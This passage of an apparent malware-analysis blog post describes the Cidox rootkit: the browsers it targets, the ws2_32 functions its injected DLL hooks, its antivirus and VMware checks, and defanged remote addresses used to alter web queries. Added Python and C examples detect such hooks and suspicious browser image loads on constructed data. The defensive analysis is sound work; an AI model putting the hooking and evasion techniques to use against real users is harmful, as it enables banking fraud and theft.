<li class="MsoNormal" style="line-height: normal; mso-list: l0 level1 lfo1; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list .5in;"><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";">maxthon.exe</span></li>
</ul>
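<div class="MsoNormal" style="line-height: normal; text-align: justify;">The handlers described above only act when they are invoked inside one of these browser processes. A defender can turn the same list around and look for exactly that situation in endpoint telemetry: a browser mapping an image from somewhere other than its install directory or the system directories. The following Python is an added example written for this post, not code from the post or from the malware; the pipe-delimited log format, the sample paths, and the set of trusted directories are assumptions chosen for the example.</div>

```python
# Added example (not code from the blog post): a small detection pass over
# constructed image-load events.  The post says the hooked handlers only act
# inside the browser processes listed above; here the same list is used the
# other way round, flagging a listed browser that maps an image from an
# unexpected location.  Log format, sample paths and the trusted directory
# roots below are assumptions made for this example.
import ntpath
from dataclasses import dataclass
from typing import Iterable, List

# Browser process names listed in the post.
TARGET_BROWSERS = frozenset({
    "iexplore.exe", "firefox.exe", "chrome.exe",
    "safari.exe", "opera.exe", "maxthon.exe",
})

# Directories from which a browser is expected to load images (assumption;
# tune to the environment).  Compared case-insensitively as path prefixes.
TRUSTED_PREFIXES = (
    "c:\\windows\\system32\\",
    "c:\\windows\\syswow64\\",
    "c:\\program files\\",
    "c:\\program files (x86)\\",
)


@dataclass(frozen=True)
class ImageLoadEvent:
    process_image: str   # full path of the process mapping the image
    image_loaded: str    # full path of the DLL/EXE being mapped


def process_name(path: str) -> str:
    """Lower-cased file name of a Windows path, e.g. 'chrome.exe'."""
    return ntpath.basename(path).lower()


def is_target_browser(path: str) -> bool:
    """True if the process image is one of the browsers the post lists."""
    return process_name(path) in TARGET_BROWSERS


def is_trusted_location(path: str) -> bool:
    """True if the image lives under one of the expected install roots."""
    lowered = path.lower()
    return any(lowered.startswith(prefix) for prefix in TRUSTED_PREFIXES)


def parse_event(line: str) -> ImageLoadEvent:
    """Parse one constructed 'ImageLoad|<process path>|<image path>' line."""
    kind, process_image, image_loaded = line.strip().split("|", 2)
    if kind != "ImageLoad":
        raise ValueError(f"unexpected event kind: {kind!r}")
    return ImageLoadEvent(process_image, image_loaded)


def suspicious_loads(events: Iterable[ImageLoadEvent]) -> List[ImageLoadEvent]:
    """Listed browsers loading an image from outside the trusted roots."""
    return [
        e for e in events
        if is_target_browser(e.process_image)
        and not is_trusted_location(e.image_loaded)
    ]


# Constructed sample events; every path here is invented for this example.
SAMPLE_LOG = [
    "ImageLoad|C:\\Program Files\\Mozilla Firefox\\firefox.exe|C:\\Windows\\System32\\wininet.dll",
    "ImageLoad|C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe|C:\\Users\\alice\\AppData\\Local\\Temp\\hook.dll",
    "ImageLoad|C:\\Windows\\explorer.exe|C:\\Users\\alice\\AppData\\Local\\Temp\\hook.dll",
    "ImageLoad|C:\\Program Files\\Internet Explorer\\IEXPLORE.EXE|C:\\ProgramData\\upd\\inj.dll",
]


def flagged_browsers(log_lines: Iterable[str]) -> List[str]:
    """Process names of the listed browsers that loaded an untrusted image."""
    return [process_name(e.process_image)
            for e in suspicious_loads(parse_event(line) for line in log_lines)]


if __name__ == "__main__":
    for e in suspicious_loads(map(parse_event, SAMPLE_LOG)):
        print(f"{process_name(e.process_image)} loaded {e.image_loaded}")
```

On the sample log this flags chrome.exe (a DLL under a user's Temp directory) and iexplore.exe (a DLL under ProgramData) and ignores firefox.exe, which loads from System32, and explorer.exe, which is not on the list. The process-name match is case-insensitive because the image path reported by the kernel may differ in case from the file name on disk; note that prefix checks on paths are a coarse heuristic and a real rule would also consider the signer of the loaded image.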
<br />
<div class="MsoNormal" style="line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; text-align: justify;">
<span style="font-family: "Times New Roman","serif"; font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";"><!--[if gte mso 9]><xml>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
DefSemiHidden="true" DefQFormat="false" DefPriority="99"
LatentStyleCount="267">
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/>
<w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/>
<w:LsdException Locked="false" Priority="34" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/>
<w:LsdException Locked="false" Priority="29" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Quote"/>
<w:LsdException Locked="false" Priority="30" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 1"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 1"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 2"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 2"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 2"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 2"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 2"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 3"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 3"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 3"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 3"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 3"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 4"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 4"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 4"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 4"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 4"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 5"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 5"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 5"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 5"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 5"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 6"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 6"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 6"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 6"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 6"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/>
<w:LsdException Locked="false" Priority="19" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/>
<w:LsdException Locked="false" Priority="21" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/>
<w:LsdException Locked="false" Priority="31" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/>
<w:LsdException Locked="false" Priority="32" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/>
<w:LsdException Locked="false" Priority="33" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Book Title"/>
<w:LsdException Locked="false" Priority="37" Name="Bibliography"/>
<w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/>
</w:LatentStyles>
</xml><![endif]--><!--[if gte mso 10]>
<style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Table Normal";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-parent:"";
mso-padding-alt:0in 5.4pt 0in 5.4pt;
mso-para-margin-top:0in;
mso-para-margin-right:0in;
mso-para-margin-bottom:10.0pt;
mso-para-margin-left:0in;
line-height:115%;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:"Calibri","sans-serif";
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;}
</style>
<![endif]-->
</span></div>
<div class="MsoNormal" style="line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; text-align: justify;">
<span style="font-family: "Times New Roman","serif"; font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";">These process names belong to the web browsers that most computer users run. Once all of the conditions are satisfied, the rootkit loads a special DLL in memory; this DLL installs additional hooks and is the component responsible for intercepting messages.</span></div>
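The hooking described above is what a defender would look for inside the browser processes the rootkit targets. The following is an added example, not code from the original post: it compares each ws2_32 export's prologue as read from a live process against a clean on-disk copy and classifies any divergence. It assumes the caller has already obtained both byte ranges by Windows-specific means (ReadProcessMemory, mapping ws2_32.dll and resolving its exports), and the prologue bytes used are constructed.

```c
/* Added example, not code from the original post: a defender-side check for
 * inline hooks on ws2_32 exports.  The injected DLL described above rewrites
 * the first bytes of recv/send/... with a jump into itself, so the prologue
 * read from the live process no longer matches the clean ws2_32.dll on disk.
 * Obtaining the two byte ranges (ReadProcessMemory, mapping ws2_32.dll and
 * resolving its export table) is Windows-specific and assumed to be done by
 * the caller; the bytes used below are constructed so the logic runs anywhere. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define PROLOGUE_LEN 16
/* The exports the post lists; a real scan resolves each of them in ws2_32.dll. */
const char *const WS2_HOOK_TARGETS[] = {"recv", "send", "WSASend", "WSARecv", "closesocket",
    "WSASocketW", "connect", "WSAConnect", "select", "WSAGetOverlappedResult"};

enum hook_kind {
    HOOK_NONE = 0,      /* in-memory bytes identical to the on-disk image */
    HOOK_JMP_REL32,     /* E9 rel32: classic detour trampoline */
    HOOK_JMP_ABS_IND,   /* FF 25 [addr]: indirect absolute jump */
    HOOK_PUSH_RET,      /* 68 addr C3: push target; ret */
    HOOK_MOV_JMP,       /* B8 addr FF E0: mov eax, target; jmp eax */
    HOOK_UNKNOWN_PATCH  /* differs, but not a pattern recognised here */
};
static const char *const HOOK_KIND_NAME[] = {
    "clean", "jmp rel32", "jmp [abs]", "push/ret", "mov eax/jmp eax", "unknown patch"};

struct export_sample {
    const char *name;
    uint8_t disk[PROLOGUE_LEN];  /* bytes from the clean DLL on disk */
    uint8_t mem[PROLOGUE_LEN];   /* bytes read from the target process */
};
struct scan_result { const char *name; enum hook_kind kind; };

/* Compare a function's prologue as seen in memory with the on-disk copy and
 * name the hook pattern, if any.  An unrecognised difference is still flagged. */
enum hook_kind classify_prologue(const uint8_t *disk, const uint8_t *mem, size_t n)
{
    if (memcmp(disk, mem, n) == 0) return HOOK_NONE;
    if (n >= 5 && mem[0] == 0xE9) return HOOK_JMP_REL32;
    if (n >= 6 && mem[0] == 0xFF && mem[1] == 0x25) return HOOK_JMP_ABS_IND;
    if (n >= 6 && mem[0] == 0x68 && mem[5] == 0xC3) return HOOK_PUSH_RET;
    if (n >= 7 && mem[0] == 0xB8 && mem[5] == 0xFF && mem[6] == 0xE0) return HOOK_MOV_JMP;
    return HOOK_UNKNOWN_PATCH;
}

/* Classify every sample; returns how many exports diverge from the disk image. */
size_t scan_exports(const struct export_sample *s, size_t count, struct scan_result *out)
{
    size_t hooked = 0;
    for (size_t i = 0; i < count; i++) {
        out[i].name = s[i].name;
        out[i].kind = classify_prologue(s[i].disk, s[i].mem, PROLOGUE_LEN);
        if (out[i].kind != HOOK_NONE) hooked++;
    }
    return hooked;
}

/* Constructed data: a hot-patchable x86 prologue (mov edi,edi; push ebp;
 * mov ebp,esp; ...) as the clean image, then rewritten in different ways. */
size_t build_samples(struct export_sample *s, size_t max)
{
    static const uint8_t clean[PROLOGUE_LEN] = {0x8B,0xFF,0x55,0x8B,0xEC,0x83,0xEC,0x10,
                                               0x53,0x56,0x57,0x8B,0x7D,0x08,0x33,0xDB};
    static const uint8_t jmp_rel[5]  = {0xE9,0x10,0x20,0x30,0x00};            /* recv */
    static const uint8_t push_ret[6] = {0x68,0x00,0x00,0x40,0x10,0xC3};       /* send */
    static const uint8_t mov_jmp[7]  = {0xB8,0x00,0x00,0x40,0x10,0xFF,0xE0};  /* WSASend */
    static const char *const names[] = {"recv", "send", "WSASend", "closesocket", "select"};
    size_t n = sizeof names / sizeof names[0];
    if (max < n) return 0;
    for (size_t i = 0; i < n; i++) {
        s[i].name = names[i];
        memcpy(s[i].disk, clean, PROLOGUE_LEN);
        memcpy(s[i].mem, clean, PROLOGUE_LEN);  /* start out identical */
    }
    memcpy(s[0].mem, jmp_rel, sizeof jmp_rel);
    memcpy(s[1].mem, push_ret, sizeof push_ret);
    memcpy(s[2].mem, mov_jmp, sizeof mov_jmp);
    s[4].mem[0] = 0x90;  /* closesocket (s[3]) stays clean; select gets an unrecognised patch */
    return n;
}

int main(void)
{
    struct export_sample samples[8];
    struct scan_result results[8];
    size_t n = build_samples(samples, 8);
    size_t hooked = scan_exports(samples, n, results);
    for (size_t i = 0; i < n; i++)
        printf("%-12s %s\n", results[i].name, HOOK_KIND_NAME[results[i].kind]);
    printf("%zu of %zu ws2_32 exports diverge from the on-disk image\n", hooked, n);
    return hooked ? 1 : 0;
}
```

A non-zero result for any of the listed exports in a browser process is the signal to pull the target module of the jump and the process's loaded-module list for the DLL the post describes.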
<div class="MsoNormal" style="line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; text-align: justify;">
The DLL hooks the following ws2_32 functions:</div>
<ul type="disc">
<li>recv</li>
<li>send</li>
<li>wsasend</li>
<li>wsarecv</li>
<li>closesocket</li>
<li>wsasocketw</li>
<li>connect</li>
<li>wsaconnect</li>
<li>select</li>
<li>wsagetoverlappedresult</li>
<li>wsaasyncselect</li>
<li>ioctlsocket</li>
<li>wsaenumnetworkevents</li>
<li>wsaeventselect</li>
</ul>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGVbk4tQ8roYsXLYTfo7K93N1cNOLoqXnzSu51cGrYnG_HXuf9QEMMNLSm-0SlEllfUfLg_9Cal29eGDO1g2biUvjNjocdInXmGa95MZWpAzO5VlFLvCHSWEGSBG2O5cP0Erl_j-NiEMs/s1600/sendhooked.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="147" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGVbk4tQ8roYsXLYTfo7K93N1cNOLoqXnzSu51cGrYnG_HXuf9QEMMNLSm-0SlEllfUfLg_9Cal29eGDO1g2biUvjNjocdInXmGa95MZWpAzO5VlFLvCHSWEGSBG2O5cP0Erl_j-NiEMs/s400/sendhooked.jpg" width="400" /></a></div>
<div style="text-align: center;">
<i>Hooked Send ws2_32 function</i></div>
<br /></div>
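Added example, not code from the post or from the Cidox sample: a Python triage helper that compares the on-disk entry bytes of the ws2_32 exports listed above with the bytes read from a running process, which is how an analyst confirms a hooked send like the one in the screenshot. The load address, export offsets, prologue bytes and hook destination are constructed stand-ins, not values taken from the sample.

```python
"""Triage helper: spot inline hooks on the ws2_32 exports a banking trojan patches."""
import struct
from typing import Dict, List, Optional, Tuple

# Export names the post lists as hooked by Cidox; the scanner checks each one.
WS2_32_HOOKED_EXPORTS = [
    "recv", "send", "WSASend", "WSARecv", "closesocket", "WSASocketW",
    "connect", "WSAConnect", "select", "WSAGetOverlappedResult",
    "WSAAsyncSelect", "ioctlsocket", "WSAEnumNetworkEvents", "WSAEventSelect",
]


def decode_hook(prologue: bytes, func_va: int) -> Optional[Dict[str, object]]:
    """Recognise the usual 32-bit inline-hook trampolines at a function entry.

    Returns {"kind", "target"} when the first bytes are a redirect, else None.
    """
    if len(prologue) >= 5 and prologue[0] == 0xE9:                          # jmp rel32
        rel = struct.unpack_from("<i", prologue, 1)[0]
        return {"kind": "jmp rel32", "target": (func_va + 5 + rel) & 0xFFFFFFFF}
    if len(prologue) >= 6 and prologue[:2] == b"\xff\x25":                  # jmp dword ptr [imm32]
        # The imm32 is a pointer slot; read it from the process before judging the target.
        return {"kind": "jmp [abs]", "target": struct.unpack_from("<I", prologue, 2)[0]}
    if len(prologue) >= 6 and prologue[0] == 0x68 and prologue[5] == 0xC3:  # push imm32; ret
        return {"kind": "push/ret", "target": struct.unpack_from("<I", prologue, 1)[0]}
    if len(prologue) >= 7 and prologue[0] == 0xB8 and prologue[5:7] == b"\xff\xe0":  # mov eax,imm32; jmp eax
        return {"kind": "mov eax/jmp eax", "target": struct.unpack_from("<I", prologue, 1)[0]}
    return None


def scan_exports(clean: Dict[str, Tuple[int, bytes]],
                 live: Dict[str, bytes],
                 module_range: Tuple[int, int]) -> List[Dict[str, object]]:
    """Compare on-disk prologues with the bytes read from the process.

    clean: export name -> (virtual address, prologue bytes from the mapped file)
    live:  export name -> prologue bytes read from the target process
    module_range: (base, size) of ws2_32.dll inside that process
    """
    base, size = module_range
    findings = []
    for name in WS2_32_HOOKED_EXPORTS:
        if name not in clean or name not in live:
            continue                                    # not exported / not captured
        va, expected = clean[name]
        actual = live[name][:len(expected)]
        if actual == expected:
            continue                                    # prologue intact
        hook = decode_hook(actual, va)
        target = hook["target"] if hook else None
        findings.append({
            "name": name,
            "va": va,
            "kind": hook["kind"] if hook else "modified (no trampoline recognised)",
            "target": target,
            # A redirect that leaves ws2_32 itself is the classic user-mode hook shape;
            # an in-module jump is more likely a legitimate hot-patch stub.
            "outside_module": target is not None and not (base <= target < base + size),
        })
    return findings


# --- Constructed sample data (hypothetical addresses, not from the real sample) ---
WS2_BASE, WS2_SIZE = 0x71A10000, 0x17000               # hypothetical load address/size
SEND_VA, RECV_VA = WS2_BASE + 0x4C27, WS2_BASE + 0x615E
HOOK_TARGET = 0x00360000                               # hypothetical injected-DLL address
# Typical hot-patchable Win32 entry: mov edi,edi; push ebp; mov ebp,esp; sub esp,N
CLEAN_SEND = bytes.fromhex("8bff558bec83ec10")
CLEAN_RECV = bytes.fromhex("8bff558bec83ec14")
# First five bytes overwritten with a jmp rel32 to the hook; the rest is untouched.
HOOKED_SEND = b"\xe9" + struct.pack("<i", HOOK_TARGET - (SEND_VA + 5)) + CLEAN_SEND[5:]

CLEAN_EXPORTS = {"send": (SEND_VA, CLEAN_SEND), "recv": (RECV_VA, CLEAN_RECV)}
LIVE_EXPORTS = {"send": HOOKED_SEND, "recv": CLEAN_RECV}

if __name__ == "__main__":
    for f in scan_exports(CLEAN_EXPORTS, LIVE_EXPORTS, (WS2_BASE, WS2_SIZE)):
        tgt = f"{f['target']:#010x}" if f["target"] is not None else "?"
        print(f"{f['name']}@{f['va']:08x}: {f['kind']} -> {tgt} "
              f"outside_module={f['outside_module']}")
```

On a live system the `clean` bytes come from the DLL file mapped with the same base as the process copy, so relocations must be applied before comparing.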
<div style="text-align: justify;">
<div class="MsoNormal" style="line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; text-align: justify;">
<span style="font-family: "Times New Roman","serif"; font-size: 12.0pt;">Cidox gathers information about the infected system, uses it to form an HTTP GET request, sends the request and awaits the result. It can be seen that it checks for installed AV engines (by looking in the Program Files directory), for a running VMware process, and for the OS and its version.</span></div>
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfht2WXchA8nN4FRgw_WEsWBEwKu52BGlwGHCSCxq2Tvx0Qw__Gfl5rEaS92b9HKyR6jxYSff-y7bBxd0Ht2hnyfxUunzz-6gQ8RmqAIExHewDzyxQgnfNp96_lQjhKK7O9bTfsM-BtWI/s1600/vmav.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="187" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfht2WXchA8nN4FRgw_WEsWBEwKu52BGlwGHCSCxq2Tvx0Qw__Gfl5rEaS92b9HKyR6jxYSff-y7bBxd0Ht2hnyfxUunzz-6gQ8RmqAIExHewDzyxQgnfNp96_lQjhKK7O9bTfsM-BtWI/s400/vmav.jpg" width="400" /></a></div>
<div style="text-align: center;">
<i>Sample message formed by Cidox DLL</i><br />
<br />
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZRvqKXTK5tF97MgdftOopHG_VqwOAxh-botJQdYtMnKjYtMnTzmOQOZaVEwC02HIARco41sqvx9E-5GJMV4UDY5mCzICI6zS6EDL9zNdmIq6VOIvYwfK_4XeLiwG-8xCFZe0h5w6N4UA/s1600/avhash.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="335" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZRvqKXTK5tF97MgdftOopHG_VqwOAxh-botJQdYtMnKjYtMnTzmOQOZaVEwC02HIARco41sqvx9E-5GJMV4UDY5mCzICI6zS6EDL9zNdmIq6VOIvYwfK_4XeLiwG-8xCFZe0h5w6N4UA/s400/avhash.jpg" width="400" /></a></div>
<div style="text-align: center;">
<i>Checks hash for common AV filenames in Program Directory</i></div>
<div style="text-align: left;">
<div class="MsoNormal" style="line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; text-align: justify;">
<span style="font-family: "Times New Roman","serif"; font-size: 12.0pt;">While the target processes are being monitored, Cidox alters the web queries sent by the user and replaces them with data coming from the following remote addresses:</span></div>
<ul type="disc">
<li>213.133.103.21<i>x</i></li>
<li>V1s.c<i>x</i></li>
<li>1nfo.c<i>x</i></li>
</ul>
</div>
<div style="text-align: left;">
<!--[if gte mso 9]><xml>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
DefSemiHidden="true" DefQFormat="false" DefPriority="99"
LatentStyleCount="267">
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 2"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 2"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 2"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
